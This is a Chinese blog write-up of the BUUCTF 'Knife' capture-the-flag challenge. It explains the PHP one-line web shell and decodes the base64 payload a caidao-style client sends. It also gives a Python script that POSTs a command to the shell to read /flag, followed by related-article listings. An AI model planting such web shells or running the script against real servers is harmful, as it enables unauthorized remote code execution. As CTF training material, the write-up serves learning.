CTF_EXP06:BUUCTF [极客大挑战 2019] Knife

最新推荐文章于 2024-05-23 10:35:19 发布
最新推荐文章于 2024-05-23 10:35:19 发布
阅读量568 收藏
点赞数 2
分类专栏: CTF_EXP编写 文章标签: EXP python 安全 BUUCTF Knife
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/109151169
版权

CTF_EXP06:BUUCTF [极客大挑战 2019] Knife

启动靶机,打开环境:
在这里插入图片描述
题目提示为菜刀,并且给出了一句话木马
直接使用中国蚁剑连接即可:
在这里插入图片描述
flag在根目录下:
在这里插入图片描述

非常基础的一道题,首次使用Python尝试一句话木马连接
首先来看一句话木马结构:

<?php @eval($_POST['attack']) ?>
  1. 使用POST传参方式,参数名为:attack
  2. 获取到参数后,将整个$_POST['attack']的内容替换为传入的值
  3. @eval()把字符串当成PHP代码执行

若使用Python连接一句木马并使用shell,需要将一句话木马作为POST传值的参数,将PHP语句作为值传入,并通过PHP语句执行shell命令。
通过对菜刀原理的刨析(POST传值),如下是菜刀发送的数据包:

op=@eval(base64_decode($_POST[attack]));&attack=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOztwcmludCgiaGVsbG8gUEhQISIpOztlY2hvKCJ8PC0iKTtkaWUoKTs=

其中:

  • op=@eval(base64_decode($_POST[attack]));为正常的一句话木马,其通过POST方式传参,参数名为attack
  • base64_decode()函数解码了传入的值
    因为对传入的值进行BASE64编码可以有效的防止特殊字符传输失败的异常。
    把值进行BASE64解码,得到:@ini_set("display_errors","0"); @set_time_limit(0); @set_magic_quotes_runtime(0); echo("->|");; print("hello PHP!");; echo("|<-"); die();

这其中:

  • @ini_set(“display_errors”,“0”);临时关闭PHP的错误显示功能

  • @set_time_limit(0);防止上传文件大马时超时

  • @set_magic_quotes_runtime(0);关闭魔术引号,这东西在4.0以后就不怎么用了

  • echo("->|");内容输出

  • print(“hello PHP!”);输出字符串

  • die();结束

使用浏览器插件HackBar测试POST传参:
在这里插入图片描述
可以得到预设的回显

EXP如下:

# -*- coding:utf-8 -*-
# name: Meng
# mail: 614886708@qq.com
# ctf_exp06:BUUCTF [极客大挑战 2019] Knife

import requests
import re


class Knife:
    def __init__(self, url_input):
        self.payload_data = {"Syc": "exec('cat /flag',$out);print_r($out);die();"}
        self.status_code = 1        # 链接状态:0:无效,1:连通
        self.url = url_input.strip()
        self.flag = ''

    def url_test(self):
        # 可以重复输错10次链接
        for i in range(9):
            try:
                # 对输入的url做判断
                if self.url.endswith('/index.php') or self.url.endswith('buuoj.cn/') or self.url.endswith('buuoj.cn'):
                    # 尝试访问链接是否为200
                    requests.get(self.url)
                    print('测试状态: 200  ' + self.url)
            except:
                print('无效链接!请重新输入!')
                self.url = input('请输入题目链接:')
                self.status_code = 0

            else:
                self.status_code = 1
                break

        if self.status_code == 0:
            print('无效链接!退出程序!')
            return

    def num_test(self):
        # 设置获取flag只能重复30次
        for i in range(30):
            try:
                r = requests.post(self.url, data=self.payload_data)

                # 匹配buuctf平台flag格式
                self.flag = re.search(r'flag\{.+\}', r.text).group()

            except:
                print('第 ' + str(i+1) + ' 次未获取到flag! 正在重试!')
            else:
                break

    def run(self):
        self.url_test()     # 连接测试
        self.num_test()     # flag获取

        if self.flag == '':
            print('已尝试30次!未获取到flag! 退出程序!')

        return self.flag


if __name__ == '__main__':
    print('ctf_exp0: BUUCTF [极客大挑战 2019] Knife')
    url_input = input('请输入题目链接:')
    print(Knife(url_input).run())
    input()  # 防止退出cmd

运行程序,输入链接,得到flag
在这里插入图片描述

Senimo_
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
工匠杯-CTF(题目+exp+解题思路)
04-01
CTF竞赛模式具体分为以下三类: 一、解题模式(Jeopardy) 在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战题目的分值和时间来排名,通常用于在线选拔赛。题目主要包含逆向、漏洞挖掘与利用、Web渗透、密码、取证、隐写、安全编程等类别。 二、攻防模式(Attack-Defense) 在攻防模式CTF赛制中,参赛队伍在网络空间互相进行攻击和防守,挖掘网络服务漏洞并攻击对手服务来得分 三、混合模式(Mix) 结合了解题模式与攻防模式的CTF赛制,比如参赛队伍通过解题可以获取一些初始分数,然后通过攻防对抗进行得分增减的零和游戏,最终以得分高低分出胜负。采用混合模式CTF赛制的典型代表如iCTF国际CTF竞赛。 资源包括工匠杯比赛的三道题目和exp,并详细写出了解题思路。
CTF_AWD_Platform:CTF 攻防对抗平台
05-03
开发目的即一款优秀的专用于比赛的CTF平台,它丰富的比赛内容,灵活的比赛模式以及各项人性化的功能模块满足了比赛举办者的所有要求。然而,同时并不局限于比赛的用途,使用者同样可以用来练习CTF解题和靶机攻防。...
BUUCTF WEB [极客挑战 2019]Knife
Y1da的博客
04-16 225
BUUCTF WEB [极客挑战 2019]Knife 根据提示直接使用蚁剑连接 在文件根目录中找到flag文件,获得flag flag{b297ceda-a835-48bb-acf9-2a6c03f68d32}
[极客挑战 2019] Knife1
kindyyy的博客
06-13 1018
这道题原本很简单的可以用蚁剑连接。但是我的蚁剑多多少少有点问题,所以我用hackbar解题,提供另外一种思路。如果你和我一样的话也可以用hackbar。打开题目,发现直接给了我们连接密码打开hackbar,先测试一下能否连接上 先查看根目录。要记得查看源码,才能真正的回显出来。 打开根目录下的flag文件。 即可获得flag。...
BUUCTF[极客挑战 2019]Knife
最新发布
jemus17的博客
05-23 217
一句话木马本质上是利用了「代码执行」函数,将 post 请求的参数传递到 eval() 中执行,我们完全可以修改 post 请求的参数来执行代码。恭喜你,你来对地方了,网上大部分的答案都是直接上菜刀连后门,实际上不使用菜刀也能拿到 flag。根据页面中的文字提示可知,作者为我们准备好了「一句话木马」,并委婉的提示,使用「菜刀」连接。这一关是「代码执行」漏洞推荐使用。在根目录下发现有个flag文件。页面中的文字提示我们使用。写上地址和密码:Syc。题目叫菜刀,就用它吧。
CTF-Web-[极客挑战 2019]Knife
归子莫的博客
05-03 5685
CTF-Web-[极客挑战 2019]Knife 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客挑战 2019]Knife 打开题目的实例 思路 看到这种题目,首先到处点一点,看...
BUUCTF Web [极客挑战 2019]Knife
热门推荐
wangyuxiang946的博客
10-28 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [极客挑战 2019]Knife一、题目简介二、思路分析1)一句话木马2)代码执行三、解题步骤1)目录遍历2)查看文件内容四、总结 一、题目简介 页面中的文字提示我们使用「菜刀」连接后门,什么!你没有菜刀?恭喜你,你来对地方了,网上大部分的答案都是直接上菜刀连后门,实际上不使用.
[极客挑战 2019]Knife
weixin_52116519的博客
04-13 564
1、 2、用蚁剑连接 3、找flag
BUUCTF [极客挑战 2019]Knife
m0_49025459的博客
05-05 936
这题开始就显示了一个一句话木马,打开网页源代码也看不出什么,就只能猜测是蚁剑和一句话木马的连接,然后说是要找菜刀,那就猜测这个一句话木马可能是在Knife.php里面,蚁剑连一下试试 http://82e3b5a9-62bb-4030-b206-21fece2410cb.node4.buuoj.cn:81/?Knife.php 就是需要耐心,仔细的找一找就行了 就找到了flag ...
ctf流量分析练习一
gclome的博客
08-23 3719
最近在学习流量分析这块的内容,找到一篇不错的文章,就准备复盘一下。 原文链接:https://www.freebuf.com/column/169738.html Q1 打开这个流量包,大致分析一下是一个邮箱请求登陆的一个流量包,一眼就看见了 user和pass,需要base64解密一下即可。 base64解密地址:https://base64.supfree.net/ username:test@51elab.com password:FLAG:ISCCTESTpas flag就藏在password里 Q
i-SOON_CTF_2019:2019第二届安洵杯过渡环境
03-09
【标题】"i-SOON_CTF_2019:2019第二届安洵杯过渡环境"指的是2019年举办的第二届安洵杯网络安全竞赛中的一个环节,这个环节涉及到了过渡环境的设置与使用。CTF(Capture The Flag)是网络安全领域常见的竞赛形式,...
ctf_walkthrough:捕获标志-演练
02-15
夺旗-演练在“捕获标志”(CTF)中,“标志”是隐藏在有目的漏洞的程序或网站中的秘密。 参赛者从其他参赛者(进攻/防守风格的CTF)或组织者那里窃取旗帜。 存在几种变体,包括在硬件设备中隐藏标志。 安全CTF通常被...
AWD_CTF_Platform:一个简单的AWD训练平台
05-13
CTF-AWD 训练平台 [TOC] 项目简介 一个简单的CTF-AWD平台,用于内部小型CTF对抗训练以及培训使用。 特点 docker化,简易部署 可部署在公网上,远程AWD攻防 训练环境可自定义扩展 基本使用方式 pre.py python pre.py ...
CTF_UNICON2020:netwars平台上托管的UNICON 2020 CTF编写
02-17
CTF_UNICON2020 netwars平台上托管的UNICON 2020 CTF编写UNICON >>> KnowYourPayloads.counterhack.com CTF 招聘人员下载了执行某种恶意软件的resume.doc之后,我们在端点上检测到恶意活动。 我们能够使该端点脱机,...
BUUCTFKnife
金 帛的博客
04-06 763
BUUCTFWP
[极客挑战 2019]Knife 1(两种解法)
m0_73734159的博客
11-04 1264
题目环境:这道题主要考察中国菜刀和中国蚁剑的使用方法以及对PHP一句话木马的理解咱们先了解一下PHP一句话木马,好吗?**eval是PHP代码执行函数,**把字符串按照 PHP 代码来执行。$_POST PHP方法将参数Syc作为POST传参方式可以理解为题目作者已经给我们了连接服务器的密码Syc,我们只需要使用工具连接题目地址就可以啦一句话木马是一种精简但高效的木马,只需要一行代码即可实现和大马(全功能木马)相当的功能。
CTFBUUCTF之[极客挑战 2019]Knife 1
weixin_44632787的博客
06-17 3306
CTFBUUCTF之[极客挑战 2019]Knife 1 启动我们的挑战项目 这里的题目简直就是在提示我们用中国菜刀连接,但是由于个人习惯这里我就用中国蚁剑来连接了。(其实中国蚁剑和中国菜刀的功能差不多,不过个人感觉蚁剑更好用一些吧)。 现在来打开我们的蚁剑工具 然后填上我们的连接和密码:Syc 然后进入到对方的登录后台 最后到这个后台的根目录下就可以找到flag值 如果你不能一下子就看出来是用蚁剑这些工具来连接,那可能是因为你做题的经验还不够。做多了自然而然就能想到了。总的来说,这题属于
BUUCTF__[极客挑战 2019]Knife_题解
风过江南乱的博客
05-22 1914
前言 想做前面那题高明的黑客,可是没学过python不会写脚本。。。而且看wp也感觉脚本也挺复杂的,以后再说吧,看来是得赶紧学习python了。 再说这题,从打开到拿到 flag ,可能还没有一分钟,着实简单。哈哈哈,可能这就是秒题吧。 看题 一看就是要用shell 连接了 F12 也没有什么提示。但发现说白给的shell。 白给,怎么白给,在哪???白嫖一下 但想想 shell 肯定肯定是PHP文件了。而一般网站都会有 index.php 所以尝试一下用蚁剑连接 index.
[极客挑战 2019]BuyFlag
07-29
- *2* *3* [CTF学习笔记——[极客挑战 2019]BuyFlag](https://blog.csdn.net/Obs_cure/article/details/113820888)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值